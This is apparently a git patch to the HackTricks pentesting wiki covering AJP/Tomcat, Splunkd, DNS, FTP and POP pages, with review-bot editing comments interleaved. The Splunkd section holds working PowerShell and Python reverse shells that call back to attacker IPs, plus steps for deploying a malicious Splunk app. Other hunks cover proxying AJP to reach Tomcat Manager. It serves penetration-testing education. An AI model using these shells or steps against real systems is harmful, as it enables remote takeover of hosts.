From ae33d7c8c60b7453dadbcdf8ddcf0def4c2d33b0 Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 12 Dec 2024 01:48:01 +0000 Subject: [PATCH] GITBOOK-4444: No subject --- SUMMARY.md | 2 +- ...09-pentesting-apache-jserv-protocol-ajp.md | 94 ++--------- network-services-pentesting/8089-splunkd.md | 150 +++++++++--------- network-services-pentesting/pentesting-dns.md | 66 ++------ .../pentesting-ftp/README.md | 4 +- network-services-pentesting/pentesting-pop.md | 26 +-- .../pentesting-web/README.md | 4 +- .../pentesting-web/drupal/README.md | 57 +++---- .../pentesting-web/drupal/drupal-rce.md | 33 +--- .../{tomcat.md => tomcat/README.md} | 12 +- .../pentesting-web/wordpress.md | 59 +++---- ...inclusion-edge-side-inclusion-injection.md | 26 +-- 12 files changed, 183 insertions(+), 350 deletions(-) rename network-services-pentesting/pentesting-web/{tomcat.md => tomcat/README.md} (89%) diff --git a/SUMMARY.md b/SUMMARY.md index c418f53a1c8..25179eb4327 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -430,7 +430,7 @@ * [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md) * [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md) * [Symfony](network-services-pentesting/pentesting-web/symphony.md) - * [Tomcat](network-services-pentesting/pentesting-web/tomcat.md) + * [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md) * [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md) * [VMWare (ESX, VCenter...)](network-services-pentesting/pentesting-web/vmware-esx-vcenter....md) * [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md) diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 92cc3dbba7d..d9c79c2b2e6 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md 
+++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -32,7 +32,7 @@ Stay informed with the newest bug bounties launching and crucial platform update ## Basic Information -From: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) +From [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) > AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. @@ -49,11 +49,9 @@ PORT STATE SERVICE ## CVE-2020-1938 ['Ghostcat'](https://www.chaitin.cn/en/ghostcat) -If the AJP port is exposed, Tomcat might be susceptible to the Ghostcat vulnerability. Here is an [exploit](https://www.exploit-db.com/exploits/48143) that works with this issue. +This is an LFI vuln which allows to get some files like `WEB-INF/web.xml` which contains credentials. This is an [exploit](https://www.exploit-db.com/exploits/48143) to abuse the vulnerability and AJP exposed ports might be vulnerable to it. -Ghostcat is a LFI vulnerability, but somewhat restricted: only files from a certain path can be pulled. Still, this can include files like `WEB-INF/web.xml` which can leak important information like credentials for the Tomcat interface, depending on the server setup. - -Patched versions at or above 9.0.31, 8.5.51, and 7.0.100 have fixed this issue. +The patched versions are at or above 9.0.31, 8.5.51, and 7.0.100. ## Enumeration 
@@ -67,25 +65,18 @@ nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 ## AJP Proxy -### Nginx Reverse Proxy & AJP +### Nginx Reverse Proxy + AJP -[Checkout the Dockerized version](8009-pentesting-apache-jserv-protocol-ajp.md#Dockerized-version) +([Checkout the Dockerized version](8009-pentesting-apache-jserv-protocol-ajp.md#Dockerized-version)) -When we come across an open AJP proxy port (8009 TCP), we can use Nginx with the `ajp_module` to access the "hidden" Tomcat Manager. This can be done by compiling the Nginx source code and adding the required module, as follows: +It's possible to communicate with an open AJP proxy port (8009 TCP) by using the Nginx `ajp_module` apache module and access the Tomat Manager from this port which could ultimately lead to RCE in the vulnerable server. -* Download the Nginx source code -* Download the required module -* Compile Nginx source code with the `ajp_module`. -* Create a configuration file pointing to the AJP Port +* Start downloading Nginx from [https://nginx.org/en/download.html](https://nginx.org/en/download.html) and then compile it with the ajp module: ```bash -# Download Nginx code -wget https://nginx.org/download/nginx-1.21.3.tar.gz -tar -xzvf nginx-1.21.3.tar.gz - -# Compile Nginx source code with the ajp module +# Compile Nginx with the ajp module git clone https://github.com/dvershinin/nginx_ajp_module.git -cd nginx-1.21.3 +cd nginx-version sudo apt install libpcre3-dev ./configure --add-module=`pwd`/../nginx_ajp_module --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib/nginx/modules make @@ -93,9 +84,9 @@ sudo make install nginx -V ``` -Comment out the entire `server` block and append the following lines inside the `http` block in `/etc/nginx/conf/nginx.conf`. +* Then, comment the `server` block and add the following in the `http` block in `/etc/nginx/conf/nginx.conf`. -```shell-session +```json upstream tomcats { server :8009; keepalive 10; 
@@ -109,41 +100,7 @@ server { } ``` -Start Nginx and check if everything is working correctly by issuing a cURL request to your local host. - -```html -sudo nginx -curl http://127.0.0.1:80 - - - - - - Apache Tomcat/X.X.XX - - - - -
- -
-

Apache Tomcat/X.X.XX

-
-
-
-

If you're seeing this, you've successfully installed Tomcat. Congratulations!

- -``` +* Finally, start nginx (`sudo nginx`) and check it works by accessing `http://127.0.0.1` ### Nginx Dockerized-version @@ -161,36 +118,11 @@ docker run -it --rm -p 80:80 nginx-ajp-proxy ### Apache AJP Proxy -Encountering an open port 8009 without any other accessible web ports is rare. However, it is still possible to exploit it using **Metasploit**. By leveraging **Apache** as a proxy, requests can be redirected to **Tomcat** on port 8009. - -```bash -sudo apt-get install libapache2-mod-jk -sudo vim /etc/apache2/apache2.conf # append the following line to the config - Include ajp.conf -sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address - ProxyRequests Off - - Order deny,allow - Deny from all - Allow from localhost - - ProxyPass / ajp://HOST:8009/ - ProxyPassReverse / ajp://HOST:8009/ -sudo a2enmod proxy_http -sudo a2enmod proxy_ajp -sudo systemctl restart apache2 -``` - -This setup offers the potential to bypass intrusion detection and prevention systems (IDS/IPS) due to the **AJP protocol's binary nature**, although this capability has not been verified. By directing a regular Metasploit Tomcat exploit to `127.0.0.1:80`, you can effectively seize control of the targeted system. - -```bash -msf exploit(tomcat_mgr_deploy) > show options -``` +It's also possible to use an **Apache AJP proxy** to access that port instead of **Nginx**. ## References * [https://github.com/yaoweibin/nginx\_ajp\_module](https://github.com/yaoweibin/nginx_ajp_module) -* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
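Review bot: the rewritten Ghostcat paragraph in the `@@ -49,11 +49,9 @@` hunk of 8009-pentesting-apache-jserv-protocol-ajp.md drops the scope caveat and turns a conditional into a certainty. The removed lines said the LFI is "somewhat restricted: only files from a certain path can be pulled" and that `WEB-INF/web.xml` "can leak important information like credentials ... depending on the server setup"; the replacement, "an LFI vuln which allows to get some files like `WEB-INF/web.xml` which contains credentials", reads as if arbitrary files were readable and credentials guaranteed. Suggested wording: "Ghostcat is a restricted LFI: only files under the web application's directory can be read, but that includes `WEB-INF/web.xml`, which may contain credentials depending on the setup." That also fixes the ungrammatical "allows to get".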
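Review bot: the `@@ -67,25 +65,18 @@` hunk replaces the concrete `wget https://nginx.org/download/nginx-1.21.3.tar.gz`, `tar -xzvf nginx-1.21.3.tar.gz` and `cd nginx-1.21.3` steps with `cd nginx-version`, which leaves the compile snippet not runnable as written. The `./configure --add-module=` line that stays points at `../nginx_ajp_module`, so it only resolves if the module clone sits beside the extracted nginx source tree, which the removed download lines guaranteed; either keep them (the version pin is harmless) or comment that `nginx-version` means the directory extracted from the nginx tarball. In the new intro sentence, "the Nginx `ajp_module` apache module" is self-contradictory (nginx_ajp_module is a third-party Nginx module, not an Apache one), "Tomat Manager" is a typo for "Tomcat Manager", and "It's possible to communicate with an open AJP proxy port ... and access the Tomat Manager from this port" would read better as "When you find an open AJP port (8009/TCP), build Nginx with the `ajp_module` and use it as a front end to reach the Tomcat Manager, which can lead to RCE".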
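Review bot: the `@@ -93,9 +84,9 @@` hunk changes the fence language from `shell-session` to `json`, but the block it wraps is an nginx `upstream tomcats { server ...:8009; keepalive 10; }` configuration and is not JSON; tag it `nginx` or leave it untagged so the highlighter does not flag every line. Also "comment the `server` block" should be "comment out the `server` block".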
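Review bot: the `@@ -161,36 +118,11 @@` hunk deletes the whole working Apache configuration and leaves only "It's also possible to use an **Apache AJP proxy** to access that port instead of **Nginx**", which gives the reader nothing to act on. The Apache route is the easier of the two (a package install plus `a2enmod proxy_ajp`, versus compiling Nginx from source), so keep at least `ProxyPass / ajp://HOST:8009/`, `ProxyPassReverse / ajp://HOST:8009/` and the `sudo a2enmod proxy_ajp` line, with the note to replace HOST with the target. Dropping the unverified IDS/IPS-bypass sentence and the dangling `msf exploit(tomcat_mgr_deploy) > show options` prompt is fine. If the block is restored, one fix: it installed `libapache2-mod-jk` but then used `ProxyPass` with `ajp://`, which is served by `mod_proxy_ajp`, so only the `proxy` and `proxy_ajp` modules are needed and mod_jk is not.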
diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md index e7808b154cd..9b7dc97b075 100644 --- a/network-services-pentesting/8089-splunkd.md +++ b/network-services-pentesting/8089-splunkd.md @@ -1,15 +1,15 @@ # 8089 - Pentesting Splunkd {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
@@ -17,36 +17,46 @@ Learn & practice GCP Hacking: &1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close( ``` - -The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) file tells Splunk **which script to run** and any other conditions. Here we set the app as enabled and tell Splunk to run the script every 10 seconds. The interval is always in seconds, and the input (script) will only run if this setting is present. - -```shell-session -cat inputs.conf - -[script://./bin/rev.py] -disabled = 0 -interval = 10 -sourcetype = shell - -[script://.\bin\run.bat] -disabled = 0 -sourcetype = shell -interval = 10 +splunk_shell/ +β”œβ”€β”€ bin (reverse shell scripts) +└── default (inputs.conf configuration) ``` -We need the `.bat` file, which will run when the application is deployed and execute the PowerShell one-liner. +The critical configuration file `inputs.conf` enables the script by: -The next step is to choose `Install app from file` and upload the application. +* Setting `disabled = 0` +* Configuring a 10-second execution interval +* Defining the script's source type -
+Deployment is straightforward: -Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat). +1. Create the malicious application package +2. Set up a listener (Netcat/socat) on the attacking machine +3. Upload the application through Splunk's interface +4. Trigger automatic script execution upon upload -```shell-session -sudo nc -lnvp 443 +Sample Windows PowerShell reverse shell: -listening on [any] 443 ... +```powershell +$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443); +$stream = $client.GetStream(); +[byte[]]$bytes = 0..65535|%{0}; +while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ + $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); + $sendback = (iex $data 2>&1 | Out-String ); + $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); + $stream.Write($sendbyte,0,$sendbyte.Length); + $stream.Flush() +}; +$client.Close() ``` -On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. - -#### Linux - -If we were dealing with a **Linux host**, we would need to **edit the `rev.py` Python script** before creating the tarball and uploading the custom malicious app. The rest of the process would be the same, and we would get a reverse shell connection on our Netcat listener and be off to the races. +Sample Linux Python reverse shell: ```python -import sys,socket,os,pty - -ip="10.10.14.15" -port="443" -s=socket.socket() -s.connect((ip,int(port))) -[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +import sys, socket, os, pty +ip = "10.10.14.15" +port = "443" +s = socket.socket() +s.connect((ip, int(port))) +[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] pty.spawn('/bin/bash') ``` 
@@ -137,15 +135,15 @@ In the following page you can find an explanation how this service can be abused * [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
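Review bot: the `@@ -17,36 +17,46 @@` hunk of 8089-splunkd.md replaces the actual `inputs.conf` listing with a three-bullet summary and loses the one non-obvious part, the stanza syntax. The removed file showed `[script://./bin/rev.py]` and `[script://.\bin\run.bat]` with `disabled = 0` and `interval = 10`; "Defining the script's source type" does not tell the reader how to point Splunk at the script, so keep the listing under the `default (inputs.conf configuration)` entry of the new tree. The new text also no longer says where the two reverse shells go: the removed paragraphs put the PowerShell one-liner in the `.bat` file (`bin/run.bat`) and said `rev.py` must be edited before building the tarball, and explained that the shell fires because the app's status is switched to `Enabled` on upload. Adding one sentence with those file names makes step 4, "Trigger automatic script execution upon upload", self-explanatory.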
diff --git a/network-services-pentesting/pentesting-dns.md b/network-services-pentesting/pentesting-dns.md index 64fd0c7e081..8c670ae72db 100644 --- a/network-services-pentesting/pentesting-dns.md +++ b/network-services-pentesting/pentesting-dns.md @@ -1,21 +1,21 @@ # 53 - Pentesting DNS {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} -
+
**Get a hacker's perspective on your web apps, network, and cloud** @@ -49,7 +49,7 @@ PORT STATE SERVICE REASON ### **Banner Grabbing** -There aren't banners in DNS but you can gran the macgic query for `version.bind. CHAOS TXT` which will work on most BIND nameservers.\ +There aren't banners in DNS but you can gran the magic query for `version.bind. CHAOS TXT` which will work on most BIND nameservers.\ You can perform this query using `dig`: ```bash @@ -142,7 +142,7 @@ If you are able to find subdomains resolving to internal IP-addresses, you shoul Another tool to do so: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan) -You can query reverse IP ranges to [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns) (this tool is also helpful with BGP). +You can query reverse IP ranges to [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#_dns) (this tool is also helpful with BGP). ### DNS - Subdomains BF @@ -204,7 +204,7 @@ dig google.com A @ ![](<../.gitbook/assets/image (146).png>) -
+
**Get a hacker's perspective on your web apps, network, and cloud** 
@@ -214,39 +214,12 @@ dig google.com A @ ### Mail to nonexistent account -Through the examination of a nondelivery notification (NDN) triggered by an email sent to an invalid address within a target domain, valuable internal network details are often disclosed. +**Sending an email to a non-existaent address** using the victims domain could trigger the victim to send a nondelivery notification (NDN) message whose **headers** could contain interesting information such as the **name of internal servers and IP addresses**. -The provided nondelivery report includes information such as: +## Post-Exploitation -* The generating server was identified as `server.example.com`. -* A failure notice for `user@example.com` with the error code `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found` was returned. -* Internal IP addresses and hostnames were disclosed in the original message headers. - -```markdown -The original message headers were modified for anonymity and now present randomized data: - -Generating server: server.example.com - -user@example.com -#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found ## - -Original message headers: - -Received: from MAILSERVER01.domain.example.com (192.168.1.1) by -mailserver02.domain.example.com (192.168.2.2) with Microsoft SMTP Server (TLS) -id 14.3.174.1; Mon, 25 May 2015 14:52:22 -0700 -Received: from filter.example.com (203.0.113.1) by -MAILSERVER01.domain.example.com (192.168.1.1) with Microsoft SMTP Server (TLS) -id 14.3.174.1; Mon, 25 May 2015 14:51:22 -0700 -X-ASG-Debug-ID: 1432576343-0614671716190e0d0001-zOQ9WJ -Received: from gateway.domainhost.com (gateway.domainhost.com [198.51.100.37]) by -filter.example.com with ESMTP id xVNPkwaqGgdyH5Ag for user@example.com; Mon, -25 May 2015 14:52:13 -0700 (PDT) -X-Envelope-From: sender@anotherdomain.org -X-Apparent-Source-IP: 198.51.100.37 -``` - -## Config files +* When checking the configuration of a Bind server check the configuration of the param **`allow-transfer`** as it indicates who 
can perform zone transfers and **`allow-recursion`** and **`allow-query`** as the indicate who can send recursive requests and requests to it. +* The following are the names of DNS related files that could be interesting to search inside machines: ``` host.conf @@ -258,15 +231,6 @@ host.conf /etc/bind/* ``` -Dangerous settings when configuring a Bind server: - -| **Option** | **Description** | -| ----------------- | ------------------------------------------------------------------------------ | -| `allow-query` | Defines which hosts are allowed to send requests to the DNS server. | -| `allow-recursion` | Defines which hosts are allowed to send recursive requests to the DNS server. | -| `allow-transfer` | Defines which hosts are allowed to receive zone transfers from the DNS server. | -| `zone-statistics` | Collects statistical data of zones. | - ## References * [https://www.myrasecurity.com/en/knowledge-hub/dns/](https://www.myrasecurity.com/en/knowledge-hub/dns/) @@ -327,7 +291,7 @@ Entry_6: Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' ``` -
+
**Get a hacker's perspective on your web apps, network, and cloud** @@ -336,15 +300,15 @@ Entry_6: {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
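Review bot: the `@@ -49,7 +49,7 @@` hunk of pentesting-dns.md fixes "macgic" but leaves "gran" in the same sentence; it should read "you can grab the magic query for `version.bind. CHAOS TXT`".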
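Review bot: typos and grammar in the `@@ -214,39 +214,12 @@` hunk of pentesting-dns.md: "non-existaent" should be "non-existent", "victims domain" should be "victim's domain", and in the new Post-Exploitation bullet "as the indicate who can send recursive requests" should be "as they indicate". Dropping the sample NDN headers is acceptable since the new sentence names what to look for (internal server names and IP addresses in the bounce headers), and losing the `zone-statistics` row from the removed table costs nothing security-relevant, but the `allow-transfer` bullet would be more useful if it named the value to look for: `allow-transfer { any; };` is the setting that lets anyone pull the zone.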
diff --git a/network-services-pentesting/pentesting-ftp/README.md b/network-services-pentesting/pentesting-ftp/README.md index 5ab8d70b150..374d5e91d02 100644 --- a/network-services-pentesting/pentesting-ftp/README.md +++ b/network-services-pentesting/pentesting-ftp/README.md @@ -164,8 +164,8 @@ wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/ * **`USER username`** * **`PASS password`** * **`HELP`** The server indicates which commands are supported -* \*\*`PORT 127,0,0,1,0,80`\*\*This will indicate the FTP server to establish a connection with the IP 127.0.0.1 in port 80 (_you need to put the 5th char as "0" and the 6th as the port in decimal or use the 5th and 6th to express the port in hex_). -* \*\*`EPRT |2|127.0.0.1|80|`\*\*This will indicate the FTP server to establish a TCP connection (_indicated by "2"_) with the IP 127.0.0.1 in port 80. This command **supports IPv6**. +* **`PORT 127,0,0,1,0,80`** This will indicate the FTP server to establish a connection with the IP 127.0.0.1 in port 80 (_you need to put the 5th char as "0" and the 6th as the port in decimal or use the 5th and 6th to express the port in hex_). +* **`EPRT |2|127.0.0.1|80|`** This will indicate the FTP server to establish a TCP connection (_indicated by "2"_) with the IP 127.0.0.1 in port 80. This command **supports IPv6**. * **`LIST`** This will send the list of files in current folder * **`LIST -R`** List recursively (if allowed by the server) * **`APPE /path/something.txt`** This will indicate the FTP to store the data received from a **passive** connection or from a **PORT/EPRT** connection to a file. If the filename exists, it will append the data. diff --git a/network-services-pentesting/pentesting-pop.md b/network-services-pentesting/pentesting-pop.md index 9ea68dff517..dc3e3596cbf 100644 --- a/network-services-pentesting/pentesting-pop.md +++ b/network-services-pentesting/pentesting-pop.md 
@@ -1,21 +1,20 @@ # 110,995 - Pentesting POP {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} - ## Basic Information **Post Office Protocol (POP)** is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and **retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of **POP clients** typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, **POP3** stands out as the most prevalently employed version. @@ -95,18 +94,9 @@ root@kali:~# telnet $ip 110 password: PA$$W0RD!Z ``` -## Dangerous Settings - -From [https://academy.hackthebox.com/module/112/section/1073](https://academy.hackthebox.com/module/112/section/1073) - -| **Setting** | **Description** | -| ------------------------- | ----------------------------------------------------------------------------------------- | -| `auth_debug` | Enables all authentication debug logging. | -| `auth_debug_passwords` | This setting adjusts log verbosity, the submitted passwords, and the scheme gets logged. | -| `auth_verbose` | Logs unsuccessful authentication attempts and their reasons. | -| `auth_verbose_passwords` | Passwords used for authentication are logged and can also be truncated. | -| `auth_anonymous_username` | This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism. | +## Logging Passwords +POP servers with the setting **`auth_debug`** enabled will be increasing the logs generated. However, if **`auth_debug_passwords`** or **`auth_verbose_passwords`** are set as **`true`**, password could be also logged in clear text in those logs. ## HackTricks Automatic Commands 
@@ -152,15 +142,15 @@ Entry_6: ``` {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
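Review bot: the new "Logging Passwords" paragraph in the `@@ -95,18 +94,9 @@` hunk of pentesting-pop.md is awkwardly worded and silently drops two settings from the removed table. "will be increasing the logs generated" should be "increases authentication logging", and "password could be also logged in clear text" should be "passwords may also be logged in clear text". These `auth_*` options are Dovecot settings rather than POP3 in general, so say Dovecot. Of the dropped rows, `auth_verbose` (logs unsuccessful authentication attempts and their reasons) and `auth_anonymous_username` (the username used with the ANONYMOUS SASL mechanism) are worth keeping: the first is what a defender looks for in the logs, the second matters wherever anonymous SASL is enabled.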
